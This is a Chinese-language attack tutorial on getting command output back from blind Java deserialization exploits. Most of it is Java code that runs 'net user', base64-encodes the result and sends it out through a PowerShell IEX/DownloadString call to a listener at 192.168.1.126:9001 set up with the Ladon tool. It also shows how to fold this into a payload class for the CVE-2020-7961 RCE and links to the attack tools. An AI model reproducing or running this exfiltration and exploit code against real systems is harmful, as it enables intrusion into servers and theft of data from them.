JAVA反序列化漏洞命令执行回显方法

<%

简介

在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。

启动WEB

Ladon web 9001

JAVA执行命令

javac main.java & java main
注意:get提交换行符需换成别的字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class main
{
public static void main(String[] args)
{

Runtime runtime = Runtime.getRuntime();
try {
BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
String line=null;
StringBuffer b=new StringBuffer();
while ((line=br.readLine())!=null) {
b.append(line+" ");
}
System.out.println(b.toString());
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};

//java.lang.Runtime.getRuntime().exec(cmd).waitFor();
java.lang.Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}

}
}

image

返回多行结果

只返回whoami结果没什么问题,但是多行无法提交,原因在换行符这里 所以不要换行符
返回结果 K8飞刀 8.0之前 URL编码(UTF8)解码 下一版本Ladon需做下解析处理或POST提交

image

BASE64提交

http://192.168.1.126:9001/getbase64 提交的结果BASE64加密
http://192.168.1.126:9001/debase64 提交的base64结果解密

注意提交不要包含空格,以免Ladon无法解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
//main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Base64.Encoder;
import java.util.Base64;//jdk 1.8
public class main
{
public static void main(String[] args)
{

Runtime runtime = Runtime.getRuntime();
try {
BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
String line=null;
StringBuffer b=new StringBuffer();
while ((line=br.readLine())!=null) {
b.append(line+" ");
}
System.out.println(b.toString());

Encoder encoder = Base64.getEncoder();
byte[] encode = encoder.encode(b.toString().getBytes());
String encodeStr = new String(encode);
System.out.println(encodeStr);

//String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};

String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/",encodeStr,"')"};


//java.lang.Runtime.getRuntime().exec(cmd).waitFor();
java.lang.Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}

}
}

这样写会多出一个空格
String[] cmd = {“cmd.exe”, “/c”, “powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.126:9001/debase64/",encodeStr,"')"};

image

这样写就没有空格
String[] cmd = {“cmd.exe”, “/c”, “powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.126:9001/debase64/"+encodeStr,"')"};

image

解决中文乱码

提交的base64结果使用UTF-8编码

Encoder encoder = Base64.getEncoder();
//byte[] encode = encoder.encode("hello".getBytes("UTF-8"));
byte[] encode = encoder.encode(b.toString().getBytes("UTF-8"));
String encodeStr = new String(encode);
System.out.println(encodeStr);

image

完美回显

由于是BASE64加密提交的,所以什么符号都可以,这样我们可以把换行加上去,得到完美回显
其它漏洞回显解决方案同理,包括不仅限于WEB漏洞,本文只是用JAVA的反序列漏洞做例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
//main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Base64.Encoder;
import java.util.Base64;//jdk 1.8
public class main
{
public static void main(String[] args)
{

Runtime runtime = Runtime.getRuntime();
try {
BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
String line=null;
StringBuffer b=new StringBuffer();
while ((line=br.readLine())!=null) {
b.append(line+"\n");
}
System.out.println(b.toString());

Encoder encoder = Base64.getEncoder();
byte[] encode = encoder.encode(b.toString().getBytes());
String encodeStr = new String(encode);
System.out.println(encodeStr);


String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/"+encodeStr,"')"};


//java.lang.Runtime.getRuntime().exec(cmd).waitFor();
java.lang.Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}

}
}

将以上代码稍微修改一下集成到以下POC里,如CVE-2020-7961 RCE漏洞,编译成class

1
2
3
4
5
6
7
8
9
10
11
12
//LifExp.java
public class LifExp {
static {
try {
String[] cmd = {"cmd.exe", "/c", "calc.exe"};
java.lang.Runtime.getRuntime().
exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
}

image

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.0版本:K8小密圈